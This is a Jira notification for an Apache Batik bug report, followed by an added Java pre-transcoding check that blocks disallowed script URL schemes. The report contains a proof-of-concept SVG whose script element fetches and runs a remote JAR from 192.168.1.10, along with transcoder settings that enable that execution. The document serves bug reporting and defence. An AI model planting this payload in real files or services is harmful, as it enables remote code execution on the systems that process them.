[ https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Simon Steiner updated BATIK-1335:
---------------------------------
    Description:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500" viewBox="0 0 450 500">
    <script type="application/java-archive" xlink:href="jar:http://192.168.1.10/poc.jar!/"></script>
</svg>

should be blocked when using:

JPEGTranscoder t = new JPEGTranscoder();
t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,");
FileInputStream stream = new FileInputStream("test.svg");
TranscoderInput input = new TranscoderInput(stream);
FileOutputStream fos = new FileOutputStream("out.jpg");
TranscoderOutput output = new TranscoderOutput(fos);
t.transcode(input, output);
fos.close();

  was:
JPEGTranscoder t = new JPEGTranscoder();
t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,");
FileInputStream stream = new FileInputStream("test.svg");
TranscoderInput input = new TranscoderInput(stream);
FileOutputStream fos = new FileOutputStream("out.jpg");
TranscoderOutput output = new TranscoderOutput(fos);
t.transcode(input, output);
fos.close();

> Jar url should be blocked by DefaultScriptSecurity
> --------------------------------------------------
>
>                 Key: BATIK-1335
>                 URL: https://issues.apache.org/jira/browse/BATIK-1335
>             Project: Batik
>          Issue Type: Bug
>            Reporter: Simon Steiner
>            Assignee: Simon Steiner
>            Priority: Major
>
> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500" viewBox="0 0 450 500">
>     <script type="application/java-archive" xlink:href="jar:http://192.168.1.10/poc.jar!/"></script>
> </svg>
>
> should be blocked when using:
>
> JPEGTranscoder t = new JPEGTranscoder();
> t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
> t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,");
> FileInputStream stream = new FileInputStream("test.svg");
> TranscoderInput input = new TranscoderInput(stream);
> FileOutputStream fos = new FileOutputStream("out.jpg");
> TranscoderOutput output = new TranscoderOutput(fos);
> t.transcode(input, output);
> fos.close();

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
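
Added example, not part of the issue or of Batik's own code: a pre-transcoding gate in Java that rejects SVG input whose script elements reference a URL scheme outside an allowlist, which catches the `jar:http://...` reference from the description. The class name `SvgScriptHrefCheck`, the allowlist contents, and the policy of refusing documents that carry a DOCTYPE are assumptions of this example.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
public class SvgScriptHrefCheck {
    static final String SVG_NS = "http://www.w3.org/2000/svg";
    static final String XLINK_NS = "http://www.w3.org/1999/xlink";
    // Assumption: this deployment only permits relative and data: script references.
    static final Set<String> ALLOWED_SCHEMES = Set.of("data");
    static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");
    /** Returns every script href whose scheme is not allowed, e.g. jar:http://... */
    static List<String> rejectedScriptHrefs(byte[] svg) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        // No DOCTYPE means no external entities; SVGs carrying a DOCTYPE fail to parse here.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        NodeList scripts = f.newDocumentBuilder()
                .parse(new ByteArrayInputStream(svg))
                .getElementsByTagNameNS(SVG_NS, "script");
        List<String> rejected = new ArrayList<>();
        for (int i = 0; i < scripts.getLength(); i++) {
            Element script = (Element) scripts.item(i);
            String href = script.getAttributeNS(XLINK_NS, "href");
            if (href.isEmpty()) href = script.getAttribute("href");
            Matcher m = SCHEME.matcher(href.trim());
            if (m.find() && !ALLOWED_SCHEMES.contains(m.group(1).toLowerCase(Locale.ROOT))) {
                rejected.add(href);
            }
        }
        return rejected;
    }

    public static void main(String[] args) throws Exception {
        // The SVG from the issue description, embedded as the sample input.
        String svg = "<svg xmlns=\"http://www.w3.org/2000/svg\""
                + " xmlns:xlink=\"http://www.w3.org/1999/xlink\">"
                + "<script type=\"application/java-archive\""
                + " xlink:href=\"jar:http://192.168.1.10/poc.jar!/\"></script></svg>";
        List<String> bad = rejectedScriptHrefs(svg.getBytes(StandardCharsets.UTF_8));
        System.out.println(bad.isEmpty() ? "ok to transcode" : "blocked script href: " + bad);
    }
}
```

Run the check on untrusted input before calling `t.transcode(input, output)`; it complements, and does not replace, upgrading to a Batik release that contains the fix for this issue.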